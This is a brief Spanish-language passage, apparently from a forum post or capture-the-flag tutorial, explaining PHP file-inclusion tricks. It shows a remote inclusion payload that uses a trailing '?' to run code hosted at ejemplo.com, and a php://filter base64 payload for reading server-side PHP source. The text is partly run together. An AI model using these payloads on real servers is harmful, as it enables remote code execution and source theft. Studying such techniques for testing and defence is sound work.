Con
allow_url_include no puedes usar
%00, pero sí poner urls y ejecutar php ajeno, así es fácil ver
archivo.txt Si tienes algún problema con el
.php del final, con poner un
?, el resto se ignora:
http://ejemplo.com/ejemplo.txt? quedaría
http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en
ejemplo.txtCon
php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver
archivo.txtphp://filter/convert.base64-encode/resource=index quedaría
php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.